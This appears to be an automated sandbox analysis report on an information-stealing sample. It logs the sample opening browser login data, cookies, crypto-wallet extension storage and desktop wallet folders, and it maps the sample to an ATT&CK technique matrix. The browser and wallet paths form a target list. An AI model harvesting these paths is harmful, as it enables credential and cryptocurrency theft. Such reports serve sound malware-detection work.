        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: number of queries: 1001
        Source: Yara matchFile source: Process Memory Space: C7B4.tmp.exe PID: 3032, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: Process Memory Space: C7B4.tmp.exe PID: 3032, type: MEMORYSTR
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218CC
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BF6
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00961B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_00961B33
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00960E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00960E5D
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        11
        Deobfuscate/Decode Files or Information
        1
        OS Credential Dumping
        1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        12
        Ingress Tool Transfer
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Native API
        Boot or Logon Initialization Scripts11
        Process Injection
        4
        Obfuscated Files or Information
        LSASS Memory23
        File and Directory Discovery
        Remote Desktop Protocol31
        Data from Local System
        21
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        PowerShell
        Logon Script (Windows)Logon Script (Windows)22
        Software Packing
        Security Account Manager44
        System Information Discovery
        SMB/Windows Admin Shares3
        Clipboard Data
        3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        DLL Side-Loading
        NTDS1
        Query Registry
        Distributed Component Object ModelInput Capture124
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Masquerading
        LSA Secrets131
        Security Software Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Virtualization/Sandbox Evasion
        Cached Domain Credentials1
        Virtualization/Sandbox Evasion
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Process Injection
        DCSync1
        Process Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
        Application Window Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

